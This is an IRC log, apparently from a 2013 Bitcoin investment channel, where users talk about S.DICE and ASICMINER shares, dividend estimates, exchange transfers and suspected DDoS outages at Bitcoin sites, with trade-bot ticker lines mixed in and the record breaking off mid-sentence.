ZedsterX: do you want to get into technical charts or what? Mar 15 20:42:41 Zed, you could always ask specific questions here while you educate yourself Mar 15 20:42:47 I was just looking for help ...trust me it won't happen again here Mar 15 20:43:17 rather than "how do i learn" you could ask "What is the diff between a green bar and a red bar" or such Mar 15 20:43:19 ZedsterX: i found this was useful for me, when i was first learning about trading stocks http://stockcharts.com/school/doku.php?id=chart_school Mar 15 20:43:30 particularly what all the technical indicators are suppose to mean Mar 15 20:43:31 i dont think any of us meant to tell you to gtfo w your Qs Mar 15 20:43:41 thanks iz Mar 15 20:43:43 np Mar 15 20:43:46 matter of fact you were given specific people to talk to too Mar 15 20:44:12 i am good thanks Mar 15 20:44:29 not trying to start shit at all Mar 15 20:44:29 jurov nu-uh :D Mar 15 20:44:44 just wanna learn Mar 15 20:45:07 mircea_popescu: did you test it? noe it's unparsable Mar 15 20:45:24 i try to keep my mouth shut here and pick up stuff just to avoid this very thing Mar 15 20:45:26 jurov i was looking at it a moment ago, it came up as rss. lesee Mar 15 20:45:58 "This is a valid RSS feed." Mar 15 20:46:10 did something subtle change ? Mar 15 20:46:14 okay but firefox suddenly insists on displaying as text Mar 15 20:46:23 ZedsterX dun sweat it man, nothing happened. Mar 15 20:46:27 jurov hm Mar 15 20:46:31 can't find out why Mar 15 20:47:00 ah yes, it says Content-Type: text/html Mar 15 20:47:16 no harm done zed :) Mar 15 20:48:03 never mind, coinbr script parses it fine Mar 15 20:49:05 so here's a specific question....dump S.DICE or hope for a comeback later in the month? Mar 15 20:49:12 :) Mar 15 20:49:29 jurov ima add the header thing to the pile. Mar 15 20:50:11 there are a few strats you could take with sdice Mar 15 20:50:30 but none are totally reliable Mar 15 20:50:36 see right there sir...strats? Mar 15 20:50:44 strategies Mar 15 20:50:46 mircea,np, it's ok. and don't forget to add stacktraces/ php code dumps on error. they're really helpful xD Mar 15 20:50:58 i know nothing...i will wait until I know wtf i am talking about Mar 15 20:50:59 [HAVELOCK] [HIM] 2 @ 1.999 = 3.998 BTC [+] Mar 15 20:51:06 heheh of course :) Mar 15 20:51:15 strats is a thing from when played WoW Mar 15 20:51:16 jurov normally server responds with a fu on error, but this is the new stuff that's still being debugged Mar 15 20:51:20 (and still not 100% ok, either). Mar 15 20:51:21 unrelated to stocks ;) Mar 15 20:51:30 kinda like aggro : Mar 15 20:51:35 right Mar 15 20:51:35 :) Mar 15 20:51:50 but with SDICE, Mar 15 20:51:59 MMORPG i understand :) Mar 15 20:52:02 keep an eye on the dividend for the month Mar 15 20:52:11 its looking pretty low this month so far Mar 15 20:52:22 whereas in past montgs Mar 15 20:52:25 recently Mar 15 20:52:34 its been higher Mar 15 20:52:36 where can you see an estimate of comi9ng dividends? Mar 15 20:52:42 nowhere Mar 15 20:52:44 but Mar 15 20:52:45 -9 Mar 15 20:52:50 you can figure it out Mar 15 20:52:52 ahh ok i see what your saying Mar 15 20:52:53 ZedsterX there's dooglus' stuff which is pretty interesting Mar 15 20:52:56 you seen that ? Mar 15 20:53:02 Dooglus does a daily report Mar 15 20:53:03 no sir Mar 15 20:53:05 sec Mar 15 20:53:27 https://bitcointalk.org/index.php?topic=80312.0 Mar 15 20:53:34 however Mar 15 20:53:40 he reports the TOTAL revenue Mar 15 20:53:43 all time Mar 15 20:53:49 right Mar 15 20:53:56 and obviously there's no rule saying it has to do in the future what it did in the past. Mar 15 20:53:59 so you have to also reference the monthly statements Mar 15 20:54:03 but still, interesting stuff Mar 15 20:54:07 to know this months profit Mar 15 20:54:07 yes of course MP Mar 15 20:54:09 to date Mar 15 20:54:13 then what you can do Mar 15 20:54:22 is divide the profit for themonth so far Mar 15 20:54:25 ThickAsThieves what's it ahead so far for march ? like 1-2k ? Mar 15 20:54:30 by how many days have passed Mar 15 20:54:40 ok i uderstand all that...so maybe I am not as dumb as i thought Mar 15 20:54:45 then multiply by the number of days in this month Mar 15 20:54:51 to project profit Mar 15 20:54:54 right Mar 15 20:55:00 yeah mp Mar 15 20:55:02 pretty low Mar 15 20:55:32 but sensible numbers dont seem to affect sdice share price Mar 15 20:55:40 it seems to often do the opposite :/ Mar 15 20:55:52 lol ya, here's the funny thing i've noticed : Mar 15 20:55:58 i noticed that too and thought I was reading something wrong Mar 15 20:56:06 when s.dice does well operationally, shares sell and price goes up Mar 15 20:56:15 when it does poorly nobody is selling so trading freezes pretty much Mar 15 20:56:24 yep Mar 15 20:56:29 it's as if there's group A which wants to buy cheap and hold forever and group B which wants to daytrade Mar 15 20:56:30 but there's still money to be made Mar 15 20:56:33 and A is pretty much raping B Mar 15 20:56:49 day trading is still possible Mar 15 20:56:52 just a low qty Mar 15 20:57:01 ya i guess so Mar 15 20:57:31 anyway, when i'm old and i retire i'll write a book about the strange edge cases at the end of regulation in free mkt. Mar 15 20:58:18 if you are holding long term (which is a fantasy in bitcoin imo) Mar 15 20:58:27 then you look at everything differently Mar 15 20:58:39 if SDICE introduced a new product or game Mar 15 20:58:40 2 different games Mar 15 20:58:43 it could skyrocket Mar 15 20:59:06 but erik doesnt wanna grow any faster than he is it seems Mar 15 20:59:22 im not entirely what his strategy is Mar 15 20:59:25 ;;seen evoorhees Mar 15 20:59:25 evoorhees was last seen in #bitcoin-assets 3 days, 17 hours, 11 minutes, and 30 seconds ago: it's how resilient btc is in the face of them that matters Mar 15 20:59:31 seems to be focusing more on his personal brand right now Mar 15 20:59:55 doing interviews and being a bitcoin jesus Mar 15 20:59:59 isn't he tied with coinbase somehow also? Mar 15 21:00:01 http://bitcointipper.com/index.html Mar 15 21:00:02 could work for him Mar 15 21:00:32 Diablo-D3 "Due to the high number of signups, we will not be able to accept new users." Mar 15 21:00:34 sweet. Mar 15 21:00:56 gtg to a meeting ttyl Mar 15 21:00:58 ZedsterX is he ? Mar 15 21:01:10 voorhees Mar 15 21:02:26 oh you were asking me? :P Mar 15 21:02:52 i wanna say coinbase or something like that...heck what do i know Mar 15 21:04:22 ahhh it's BitInstant Mar 15 21:04:22 yeah Mar 15 21:04:41 i mean it's a small community, pretty much everyone knows everyone, but otherwise... Mar 15 21:09:30 mircea_popescu: your in europe right? Mar 15 21:16:04 all the cool kids are. Mar 15 21:16:31 hehe Mar 15 21:17:00 yes. Mar 15 21:18:02 so why is there no BitInstant equivalent in EU? or do some countries? IE go to a store and pay cash for BTC instantly. I know Denmark doesn't Mar 15 21:19:00 ZedsterX bitcoin-central.net is much better Mar 15 21:19:49 you transfer funds to them isntantly and get bitcoin. sepa zone only, but miles ahead of mtgox and all the rest. Mar 15 21:19:59 and they're properly registered (which nobody else is) Mar 15 21:20:18 sepa is not instant Mar 15 21:20:51 if i sepa from my online bank its queued for up to 24 hours Mar 15 21:20:54 another reason why bitcoin is 50. Mar 15 21:21:35 ;;ticker Mar 15 21:21:35 BTCUSD ticker | Best bid: 46.85111, Best ask: 46.99000, Bid-ask spread: 0.13889, Last trade: 46.99000, 24 hour volume: 18791.39020569, 24 hour low: 46.35000, 24 hour high: 47.47999, 24 hour vwap: 47.08453 Mar 15 21:21:41 meeting cancelled, yay Mar 15 21:21:43 and a $7 charge Mar 15 21:22:02 ZedsterX i know it's specified as "up to 24 hours" but in practice i've yet not had a transfer not be instant. Mar 15 21:23:11 sweet i will check it out ..only business days though right? Mar 15 21:23:24 well yes Mar 15 21:23:39 just checking i can hope Mar 15 21:25:35 anyway, considering what zee american folk put up with the weeks of mtgox/coinlab/etc... Mar 15 21:26:05 i sent campbx a check monday last week Mar 15 21:26:12 they are a 6-hr drive from me Mar 15 21:26:19 still no deposit :/ Mar 15 21:26:31 typical horror story. Mar 15 21:28:30 [BTCTC] [S.DICE-PT] 20 @ 0.00545 = 0.109 BTC [+] Mar 15 21:28:39 [BTCTC] [S.DICE-PT] 11 @ 0.00545 = 0.06 BTC [+] Mar 15 21:36:59 Ukto https://bitcointalk.org/index.php?topic=153444.0 mebbe your plate. Mar 15 21:37:37 thanks Mar 15 21:37:43 not sure if this is a silly question, but in BTCT's Analysis area, when i sell a share, which value does it use to determine the value of that one share if I paid various prices and own many? Mar 15 21:38:23 [BTCTC] [ASICMINER-PT] 9 @ 0.79 = 7.11 BTC [+] Mar 15 21:38:45 your cost basis would be logical. Mar 15 21:39:36 so it would take the amount i sold it for, subtract from the total current value and divide by whats left to give me my average Mar 15 21:39:49 no. Mar 15 21:39:49 effectiveky Mar 15 21:39:55 ? Mar 15 21:40:00 you buy shares q1..q2 at prices p1...p2. Mar 15 21:40:26 this aggregates into a qt, pt pair which is qt = sum qi ; pt = sum pi *qi / sum qi Mar 15 21:40:32 when you sell a share it counts it at pt. Mar 15 21:41:23 got it Mar 15 21:41:34 course, i'm just saying it'd be logical... have no idea how they actually do it. Mar 15 21:41:51 i was asking both sides kinda Mar 15 21:41:52 philosoraptor if pi 3.14, qi is 6.28? Mar 15 21:42:00 i know only burnside can answer that aspect Mar 15 21:42:41 lol Mar 15 21:44:31 posted, thanks again MP. going back to sleep Mar 15 21:44:46 nn Mar 15 21:45:06 hm, so how do i find a talented game artist person ;/ Mar 15 21:45:47 howdy Mar 15 21:46:07 mircea_popescu u have instant sepa transfers to france? O.o Mar 15 21:46:17 find a game you think has a appropriate art and find out who they worked with Mar 15 21:46:19 you have osme private bank, no? Mar 15 21:46:26 howdy Chub Mar 15 21:46:42 jurov shit i said too much huh Mar 15 21:46:54 ThickAsThieves that's an idea actually. Mar 15 21:47:23 is it illustrations or pixel work? Mar 15 21:47:31 or 2d rendering stuff? Mar 15 21:47:34 3d* Mar 15 21:47:43 illustrations. Mar 15 21:47:46 basically, game cards. Mar 15 21:47:50 ha! Mar 15 21:47:52 i was gonna say Mar 15 21:47:53 wha ? Mar 15 21:47:54 ZedsterX, i have to wait 1-2 days. but the fee is 20 cents at most, no problem Mar 15 21:47:57 look at MTG artists Mar 15 21:48:01 whossat ? Mar 15 21:48:06 lotsa good ones with decent rates Mar 15 21:48:07 (mp only fucks aritsts, doesn't know any) Mar 15 21:48:10 Magic The Gathering Mar 15 21:48:29 is there a forum or somfin' ? Mar 15 21:48:32 jobsite ? Mar 15 21:48:44 dunno about that, Mar 15 21:48:54 but you can browse card art pretty easily Mar 15 21:48:59 and they all say the artist name on the card Mar 15 21:49:06 and each artist typically has a website Mar 15 21:49:15 you know this is pretty sweet an idea. thanks thicksy Mar 15 21:49:20 np Mar 15 21:49:20 anyone here have a windows machine, an mpex account and a willingness to see if my mpex gui windows package will work on their system? Mar 15 21:49:27 there are also less popular games Mar 15 21:49:33 with just as good art Mar 15 21:49:39 smickles i have Mar 15 21:49:40 those artists might be cheaper Mar 15 21:49:54 i don't really mind paying something reasonable. Mar 15 21:50:00 send it over smickles Mar 15 21:50:04 alright jurov, i'll setup a link to the file and pm it to ya Mar 15 21:50:30 i have only xp here. guess kako has sth better Mar 15 21:50:38 Just joking. Nice to see a GUI being made. Mar 15 21:50:46 so we can both test Mar 15 21:50:48 Namworld still ? Mar 15 21:50:52 mpex account still 50 btc? Mar 15 21:50:57 Doffx 30 yet Mar 15 21:51:01 Wasn't it 30 BTC? Mar 15 21:51:02 Doffx: no, 90 Mar 15 21:51:06 lol Mar 15 21:51:32 http://mpex.co/faq.html#17 Mar 15 21:51:41 mp, http://tnielsen.com/ Mar 15 21:51:53 she's pretty venerable in the MTG world Mar 15 21:52:10 Looks like 30 Mar 15 21:52:47 this guy is dope too http://www.rkaneproductions.com/ Mar 15 21:53:07 comic book artists is another idea Mar 15 21:53:13 i'll stop now :) Mar 15 21:53:29 You need an account Doffx? =/ Mar 15 21:53:34 Contact Us / FAQ. If you have a questions not answered below, please complete the Contact Information form below and we will contact you as soon as possible. Mar 15 21:53:37 heh. i'll pass. Mar 15 21:55:01 [BTCTC] [ASICMINER-PT] 1 @ 0.79 BTC [+] Mar 15 21:55:17 No, I do not Namworld. Mar 15 22:10:45 smicklies, i can give it a try also Mar 15 22:10:51 smickles Mar 15 22:16:41 [BTCTC] [S.DICE-PT] 2 @ 0.00545 = 0.0109 BTC [+] Mar 15 22:19:10 moment, he has to redo it... unpacked it, the win directory was full with .so files and ELF binaries :D Mar 15 22:39:34 [MPEX] [S.MPOE] 11606 @ 0.00073181 = 8.4934 BTC [+] Mar 15 22:39:35 [MPEX] [S.MPOE] 7714 @ 0.00073435 = 5.6648 BTC [+] Mar 15 22:49:48 [MPEX] [S.DICE] 1475 @ 0.0058822 = 8.6762 BTC [-] Mar 15 22:51:56 [MPEX] [S.MPOE] 586 @ 0.00073435 = 0.4303 BTC [+] Mar 15 22:51:58 [MPEX] [S.MPOE] 1400 @ 0.00073667 = 1.0313 BTC [+] Mar 15 22:52:00 [MPEX] [S.MPOE] 7939 @ 0.0007407 = 5.8804 BTC [+] Mar 15 22:52:02 [MPEX] [S.MPOE] 8594 @ 0.00074616 = 6.4125 BTC [+] Mar 15 22:52:04 [MPEX] [S.MPOE] 1000 @ 0.00076706 = 0.7671 BTC [+] Mar 15 22:52:14 [MPEX] [S.MPOE] 481 @ 0.00076717 = 0.369 BTC [+] Mar 15 22:53:14 [BTCTC] [ASICMINER-PT] 15 @ 0.79 = 11.85 BTC [+] Mar 15 22:53:58 [HAVELOCK] [SDICE] 7 @ 0.55 = 3.85 BTC [-] Mar 15 22:54:58 [HAVELOCK] [SDICE] 1 @ 0.5311 BTC [-] Mar 15 23:05:42 anyone doing store gift stuff for btc anymore ? Mar 15 23:06:14 i normally convert to amazon these days Mar 15 23:06:22 can get almost everything on amazon Mar 15 23:07:08 mp, doesnt bitmit have those? Mar 15 23:07:10 or SR Mar 15 23:07:28 i want trader joe;'s specifically Mar 15 23:07:39 ThickAsThieves i have no idea tbh Mar 15 23:07:56 https://bitcointalk.org/index.php?topic=153453.0;topicseen Mar 15 23:08:00 ^ mircea_popescu Mar 15 23:08:55 jcpham i like dt's reply Mar 15 23:09:03 ya me too Mar 15 23:09:29 what causes people to share that much info with strangers Mar 15 23:10:11 boredom. Mar 15 23:10:21 i think you underestimate just how empty the average life is. Mar 15 23:11:01 notwithstanding midnightmagic's copacetic delusions, the majority of the population lives confined to a vinyl siding box with a lcd screen in it. that's all, all day long, weeks after weeks after weeks. Mar 15 23:11:06 just... empty nothing. Mar 15 23:11:34 i mostly just masterbate Mar 15 23:12:11 master bait ? Mar 15 23:12:23 master bathe ? Mar 15 23:12:38 no i put my hand on my cock Mar 15 23:12:55 and move it around a lot until i orgasm Mar 15 23:12:59 o urcock. with an u :D Mar 15 23:13:03 try it sometime Mar 15 23:13:19 im wrapped up too tight. Mar 15 23:13:28 hi everyone. Is btc-e down? Mar 15 23:13:31 i'm lying, I've never masterbated in my life Mar 15 23:14:05 hi skytrader_ we dunno. is it ? Mar 15 23:14:51 I can go to www.btc-e.com but I can't load any other page Mar 15 23:15:14 micrea-popescu, I do not know how you don't strangle puppies after IRC Mar 15 23:15:25 or BCT Mar 15 23:15:26 jborkl cause i cut up rabbits. Mar 15 23:15:38 oh, well -I see Mar 15 23:21:41 https://www.bitinstant.com/ Mar 15 23:21:44 Could not connect to remote server Mar 15 23:21:48 am i alone ? Mar 15 23:22:21 yes Mar 15 23:22:39 I hope it's not too lonely out there. Mar 15 23:22:53 so, bitcoins end up being considered gateway drug and banned thus? funny Mar 15 23:23:06 jurov ? Mar 15 23:23:21 Hmm, www.bitinstant.com isn't loading right now. Mar 15 23:23:21 The computers that run www.bitinstant.com are having some trouble. Usually this is just a temporary problem, so you might want to try again in a few minutes. Mar 15 23:23:25 butterfly labs getting ddos Mar 15 23:23:26 dude its not even resolving Mar 15 23:23:35 saw that thead... guy wanted to invest, lost all to sdice Mar 15 23:24:07 oh, why nobody told him to buy s.dice stock? must fix. Mar 15 23:25:51 Would be funny that BFL never delivers... Mar 15 23:26:02 he thought he would invest in less than 1 Mar 15 23:26:21 bitinstant.com Error 21 (net::ERR_NETWORK_CHANGED): Unknown error. Mar 15 23:26:25 Namworld http://browsershots.org/https://www.bitinstant.com/ Mar 15 23:26:28 it's mostly not loading. Mar 15 23:26:31 i think they're getting da ddos. Mar 15 23:26:43 oh. I only tried once but it loaded Mar 15 23:26:49 DDoS possibly, yeah Mar 15 23:26:51 you prolly rode the storm Mar 15 23:26:55 loads now Mar 15 23:27:19 ThickAsThieves if you look there, it loaded for like 2% of the browsers. typical ddos sympthom Mar 15 23:29:45 I'll assume someone manipulated the price, sold a bunch near 30-50 and his now trying to impact Bitcoin negatively. But only because I don't like the idea someone would do it for entertainment purposes/spite. Mar 15 23:30:16 I refresh but it loads in like 0.25 seconds here each time. Mar 15 23:30:21 Odd. Mar 15 23:30:51 [BTCTC] [ASICMINER-PT] 10 @ 0.837898 = 8.379 BTC [+] Mar 15 23:31:02 [BTCTC] [ASICMINER-PT] 10 @ 0.837899 = 8.379 BTC [+] Mar 15 23:31:39 [BTCTC] [ASICMINER-PT] 4 @ 0.83799 = 3.352 BTC [+] Mar 15 23:31:43 interesting. Mar 15 23:32:08 wtf Mar 15 23:32:15 asicminer is so overrated Mar 15 23:32:16 xD Mar 15 23:32:21 0.84 for a share Mar 15 23:32:21 [BTCTC] [GSDPT] 2 @ 0.005199 = 0.0104 BTC [+] Mar 15 23:32:22 kidneys? Mar 15 23:32:32 (those were my shares that got sold btw= Mar 15 23:32:52 I could have had 2k if mircea hadn't borrowed them to short long ago xD Mar 15 23:33:22 taking the pools offline at the same time and solomining is probably the most profitable thing you can do Mar 15 23:33:33 seems like no one is trying that anymore Mar 15 23:33:33 lol ya that didn't work too well huh. Mar 15 23:33:54 jcpham how does that work ? spend a week on a block ? Mar 15 23:34:18 well back when things were simpler... Mar 15 23:34:27 oddly enough, A good idea it would appear, but you'd need people to stick to those pools for like a whole difficulty to bring it down. Mar 15 23:34:39 They'd probably all switch to solo Mar 15 23:35:02 you don't need a terahash Mar 15 23:38:14 so umm Mar 15 23:38:21 what do you guys think of ASICMINER share value? Mar 15 23:38:26 i think it's way high... Mar 15 23:39:49 Some think it's undervalued... idk Mar 15 23:45:12 if the asic release climate remains unchanged, other than asicminer getting 60TH online Mar 15 23:45:16 its grossly undervalued Mar 15 23:46:26 but obv Luke Jr will save the day for BFL, he's our HeeRo right? Mar 15 23:47:20 ThickAsThieves so far avalons seem to be dominating hashing Mar 15 23:47:32 judging by how unknowns have shrunk the asicminer pools Mar 15 23:47:41 are they i havent been keeping up i guess Mar 15 23:48:03 do they mostly use ozcoin? Mar 15 23:48:12 oh wait Mar 15 23:48:15 you said uknowns Mar 15 23:49:24 300 units by 68- should be about 20 th from avalon- depending on what is delivered Mar 15 23:49:27 unknows are like 55-60% of the pool now Mar 15 23:49:41 network is at 39 th Mar 15 23:49:43 how many avalons are already out? Mar 15 23:50:15 how much is asicminer supposed to be? Mar 15 23:50:24 how many th Mar 15 23:51:28 asic is at 6th i think Mar 15 23:51:33 asicminer Mar 15 23:52:04 6th from am- 10 from avalon and the 24 we had before Mar 15 23:52:11 seems about right Mar 15 23:52:52 ;;bc,stats Mar 15 23:52:54 Current Blocks: 226060 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 1747 blocks | Next Difficulty In About: 1 week, 2 days, 22 hours, 13 minutes, and 38 seconds | Next Difficulty Estimate: 5828967.64264 | Estimated Percent Change: 20.24323 Mar 15 23:53:02 i think there are some other factors to consider re stock values that people aret considering, Mar 15 23:53:13 that we are spoiled at current interest rates Mar 15 23:53:24 which will get squeezed to be smaller over time Mar 15 23:53:39 and which assets will be most resilient to that Mar 15 23:53:56 asicminer? sdice? Mar 15 23:54:09 ThickAsThieves: how they will get squeezed? Mar 15 23:54:18 more investors Mar 15 23:54:32 more money being invested overall Mar 15 23:54:39 yes, dramatic price increase then... and that's bad thing? Mar 15 23:55:25 today i can be picky and say and choose from stuff that pays 1%, 2%, 5% per month Mar 15 23:55:47 but thats so high in the scheme of things Mar 15 23:56:04 or should i say, compared to wall st Mar 15 23:56:09 and banks Mar 15 23:56:13 [BTCTC] [RSM] 1 @ 0.00672 BTC [-] Mar 15 23:57:01 [BTCTC] [RSM] 1 @ 0.006711 BTC [-] Mar 15 23:57:20 rates will decline on bitcoin investments Mar 15 23:58:30 [BTCTC] [S.MPOE-PT] 2 @ 0.000674 = 0.0013 BTC [-] Mar 15 23:58:50 As long as whole thing remains unregulated, there will be new HYIPs, some even legit. Mar 15 23:59:34 without taxes + reg burdens most stock market dividends would be 30-80% higher then they are today Mar 15 23:59:38 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Mar 16 00:00:41 [BTCTC] [BTC-BOND] 1 @ 0.00988 BTC [-] Mar 16 00:00:47 i do think you have to be at least a little bit of a day trader and btc enuthusiast to have a chance of keeping up Mar 16 00:01:19 daytrading is no different then playing satoshi dice Mar 16 00:01:28 [BTCTC] [BTC-BOND] 5 @ 0.009861 = 0.0493 BTC [-] Mar 16 00:01:32 yes if you're bad at it XD Mar 16 00:01:48 tiberiusv thats an overstatement Mar 16 00:01:52 yes it is risky Mar 16 00:02:00 but there are clear ways to profit Mar 16 00:03:16 anduck, good job on moving your shares Mar 16 00:03:22 not sure if this is a silly question, but in BTCT's Analysis area, when i sell a share, which value does it use to determine the value of that one share if I paid various prices and own many? Mar 16 00:03:41 jborkl: been doing it and i am successing on it Mar 16 00:03:42 =) Mar 16 00:04:03 it works by taking the share count you currently have, and working backwards in your trade history figures out the weighted average purchase price for the shares you're currently holding Mar 16 00:04:05 good timing Mar 16 00:04:29 http://trilema.com/2013/boys-and-girls-i-got-news-were-being-probed/ Mar 16 00:04:32 so it essentially subtracts one averaged unit Mar 16 00:04:44 i'd appreciate if anyone puts that up on reddit/wherever, distributes it Mar 16 00:05:04 (and once before in January but that didn’t much at all), Mar 16 00:05:08 ThickAsThieves so he does it exactly as described, by cost basis Mar 16 00:05:23 word Mar 16 00:05:29 mp ^ typo Mar 16 00:06:02 yup Mar 16 00:06:09 ty! Mar 16 00:07:58 i didnt really think about how BTC-e was probably the same crew Mar 16 00:08:03 doing the ddos Mar 16 00:08:16 i dunno, i just added everything that came to mind there to see what people say Mar 16 00:08:16 way more likely than nvc-haters Mar 16 00:09:59 [HAVELOCK] [SDICE] 1 @ 0.5311 BTC [-] Mar 16 00:10:00 [HAVELOCK] [SDICE] 1 @ 0.5311 BTC [-] Mar 16 00:10:03 all this probing, surely theyd have explored some holes Mar 16 00:10:36 maybe they are identifyng all weaknesses in btc world Mar 16 00:10:45 to manipulate things Mar 16 00:10:51 ThickAsThieves i think it's just doing the ddos part. Mar 16 00:10:52 Asicminer quick back of the napkin - 4400 approx blocks per month * 25.2 = 110880 BTC month / percentage of network asicminer has 15.3% = 16964 BTC Mar 16 00:10:56 pass the foil hat plz Mar 16 00:11:02 you will always make some assumptions when casing a joint. Mar 16 00:13:42 [BTCTC] [COGNITIVE] 1 @ 0.19797 BTC [+] Mar 16 00:13:44 [BTCTC] [COGNITIVE] 1 @ 0.19798 BTC [+] Mar 16 00:18:22 asicminer hasnt really been giving any detailed financials have they? Mar 16 00:19:03 not rly no. Mar 16 00:22:08 [BTCTC] [RSM] 1 @ 0.00889 BTC [+] Mar 16 00:34:36 [BTCTC] [BTC-BOND] 4 @ 0.00999 = 0.04 BTC [+] Mar 16 00:35:05 .pool Mar 16 00:36:56 !ticker mpex s.dice Mar 16 00:36:58 [MPEX:S.DICE] 1D: 0.0058822 / 0.00591811 / 0.00599963 (2125 shares, 12.58 BTC), 7D: 0.005 / 0.00576462 / 0.006 (52089 shares, 300.27 BTC), 30D: 0.00300001 / 0.00613678 / 0.0069 (2362489 shares, 14,498.08 BTC) Mar 16 00:37:44 lol double paranoia: "look who retained access to the sites under attack" Mar 16 00:38:29 but there was no major movement on mpex during the attack iirc Mar 16 00:38:42 [MPEX] [S.MPOE] 6150 @ 0.00074934 = 4.6084 BTC [-] Mar 16 00:39:27 or dunno, maybe they attacked the server to stole all the pics from /dtng ? Mar 16 00:40:12 WTS dtng photo library Mar 16 00:41:20 btw in roughly the same timeframe, sites of several czech banks got ddosed Mar 16 00:41:33 ofc, they did not reveal parameters Mar 16 00:42:09 i blame the russians Mar 16 00:42:38 [BTCTC] [ASICMINER-PT] 10 @ 0.8 = 8 BTC [-] Mar 16 00:43:00 jurov ya i just answered Mar 16 00:43:21 jurov hm. got some newslinks or anything ? Mar 16 00:44:39 [BTCTC] [S.MPOE-PT] 362 @ 0.000707 = 0.2559 BTC [+] Mar 16 00:44:53 http://www.zive.sk/hackeri-napadli-weby-ceskych-bank-problemy-maju-i-slovenske-doplnene/sc-4-a-307515/default.aspx Mar 16 00:45:03 (should translate) Mar 16 00:45:53 http://translate.google.com/translate?sl=sk&tl=en&js=n&prev=_t&hl=sk&ie=UTF-8&eotf=1&u=http%3A%2F%2Fwww.zive.sk%2Fhackeri-napadli-weby-ceskych-bank-problemy-maju-i-slovenske-doplnene%2Fsc-4-a-307515%2Fdefault.aspx Mar 16 00:46:50 Original article today at 12:10: Hackers attacked this morning website of Czech banks reported Novinky.cz server. Mar 16 00:46:52 :D Mar 16 00:47:26 We seem to have stabilized Mar 16 00:47:45 [MPEX] [S.MPOE] 1200 @ 0.00075288 = 0.9035 BTC [+] Mar 16 00:51:20 [MPEX] [S.MPOE] 1000 @ 0.00073207 = 0.7321 BTC [-] Mar 16 00:51:22 [MPEX] [S.MPOE] 4050 @ 0.00073206 = 2.9648 BTC [-] Mar 16 01:00:31 [MPEX] [O.BTCUSD.P430T] 1000 @ 0.06560726 = 65.6073 BTC [-] Mar 16 01:00:47 [MPEX] [S.DICE] 2000 @ 0.0055 = 11 BTC [-] Mar 16 01:01:28 [MPEX] [O.BTCUSD.P450T] 1000 @ 0.08473237 = 84.7324 BTC [-] Mar 16 01:03:40 bitbet over 4k btc bet! yay. Mar 16 01:04:44 http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/ Mar 16 01:04:46 Wow Mar 16 01:04:49 HOly shit. ahhahahahah Mar 16 01:05:03 lol wut ?! Mar 16 01:05:11 don't tell me they;ve moved to july ? Mar 16 01:05:47 theres the april one, then theres a july one Mar 16 01:05:48 Lol Mar 16 01:05:58 Avalon looks so good right now Mar 16 01:08:04 except for all the lying Mar 16 01:08:26 "we lie much less than bfl!" Mar 16 01:11:41 lol pigeons Mar 16 01:12:15 Bowjob josh-zerlan.com Mar 16 01:12:18 are you saying they are lying about lying Mar 16 01:12:25 so they really are lying more than bfl? Mar 16 01:12:33 they're not telling the truth about telling the lie! Mar 16 01:13:02 more ddos with a bonus gift http://www.theverge.com/2013/3/15/4109568/cyber-blogger-brian-krebs-ddos-attack-police-raid Mar 16 01:14:30 great to not live in the us. Mar 16 01:14:30 where at the bitbet statements? Mar 16 01:14:34 are* Mar 16 01:14:57 tiberiusiv bitbet.us search bfl Mar 16 01:15:17 i mean the financial statements for the stock Mar 16 01:15:29 a Mar 16 01:15:49 http://trilema.com/bitbet-february-2013-statement Mar 16 01:15:51 i thought they were on josh-zerlan.com Mar 16 01:15:59 http://trilema.com/bitbet-january-2013-statement Mar 16 01:16:11 http://trilema.com/sbbet-its-happening Mar 16 01:16:31 oh nvm i misread. Mar 16 01:16:51 kakobrekla http://en.reddit.com/r/Bitcoin/comments/1adogi/josh_zerlan_ftw/ Mar 16 01:17:05 and the prospectus please Mar 16 01:17:07 [MPEX] [O.BTCUSD.P430T] 750 @ 0.06557816 = 49.1836 BTC [-] Mar 16 01:17:09 [MPEX] [O.BTCUSD.P450T] 1000 @ 0.0847004 = 84.7004 BTC [-] Mar 16 01:17:18 tiberiusiv http://mpex.co/?mpsic=S.BBET Mar 16 01:17:33 hehe Mar 16 01:17:43 someone needs to own up. who was mr 500 BTC Mar 16 01:20:50 so bitbet is currently valued at 18100 BTC Mar 16 01:20:58 [MPEX] [S.DICE] 1 @ 0.00588217 BTC [+] Mar 16 01:21:05 MP, you should switch the math question around Mar 16 01:21:20 36 can be exploited Mar 16 01:22:06 !ticker m s.bbet Mar 16 01:22:07 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00181 / 0.00181 / 0.00181 (200 shares, 0.36 BTC), 30D: 0.0015 / 0.00178945 / 0.00197 (104708 shares, 187.37 BTC) Mar 16 01:22:20 tiberiusiv something like that roughly speaking Mar 16 01:22:42 300 p/e ratio based on the first 2 months Mar 16 01:22:58 [HAVELOCK] [HIM] 2 @ 1.98 = 3.96 BTC [-] Mar 16 01:23:00 [HAVELOCK] [HIM] 27 @ 1.999 = 53.973 BTC [+] Mar 16 01:23:09 what did it make so far, like 12 ? Mar 16 01:23:19 ;;calc 144 / 180 Mar 16 01:23:19 0.8 Mar 16 01:23:44 a my bad, it's half that. like .4 Mar 16 01:24:52 housebets are bets the house is offering? Mar 16 01:25:02 or participating in Mar 16 01:25:08 bfl is down Mar 16 01:25:12 the website Mar 16 01:25:23 https://www.butterflylabs.com/ Mar 16 01:25:25 uh oh Mar 16 01:25:32 tiberiusiv with every new bet, the house will split .1 btc (or more) among yes/no Mar 16 01:25:39 and link the submitter's address to the lower amt. Mar 16 01:26:05 hey mp, if the lower amount loses, you lose the bet too? Mar 16 01:26:28 mircea_popescu: isnt it structued like intrade? Mar 16 01:26:39 no. Mar 16 01:26:47 Bowjob what do you mean ? Mar 16 01:27:19 Their website seems down on my end Mar 16 01:27:23 Though their forums work Mar 16 01:27:29 ddos, maybe Mar 16 01:27:37 http://butterflylabs.com/ Mar 16 01:27:42 does it work for anyone else? Mar 16 01:27:47 mircea: so lets say i place a bet, what does the house do? Mar 16 01:28:18 how does the house set the odds Mar 16 01:28:45 the house doesn't set the odds. .. Mar 16 01:28:58 tiberiusiv the admin that aprpoves your bet also splits the .1 pot Mar 16 01:29:06 like 0.07/0.03 or w/e Mar 16 01:29:29 so is it possible the house can ever have a major loss Mar 16 01:29:49 how ? Mar 16 01:29:57 it can lose at most something like 